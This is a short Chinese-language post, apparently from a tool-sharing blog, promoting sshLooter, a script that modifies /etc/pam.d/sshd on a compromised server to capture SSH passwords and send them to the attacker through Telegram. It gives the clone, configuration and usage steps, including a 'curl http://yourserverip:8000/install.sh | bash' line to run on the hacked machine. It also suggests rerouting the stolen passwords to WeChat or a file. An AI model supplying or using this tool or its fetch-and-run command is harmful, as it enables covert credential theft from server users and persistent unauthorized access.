sshLooter是一个Python脚本,它使用PAM模块通过记录密码来窃取SSH密码,并在用户登录时通过Telegram通知脚本管理员,而不是通过不太可靠的strace。
通过修改/etc/pam.d/sshd,达到记录ssh密码,由于他会把记录到的密码发送到telegram,针对某些目标不是很方便,可以修改sendMessage函数达到发送到微信或者记录到文件。
安装
git clone https://github.com/mthbernardes/sshLooter.gitcd sshLooter
组态
编辑install.sh上的脚本,并添加您的电报bot api和您的用户ID。在电报上打电话给@botfather创建一个机器人并调用@userinfobot来获取你的用户ID。
用法
在被黑的计算机上执行 curl http:// yourserverip:8000 / install.sh | bash在您的服务器上执行 python -m SimpleHTTPServer
下载地址:https://github.com/mthbernardes/sshLooter
你可能喜欢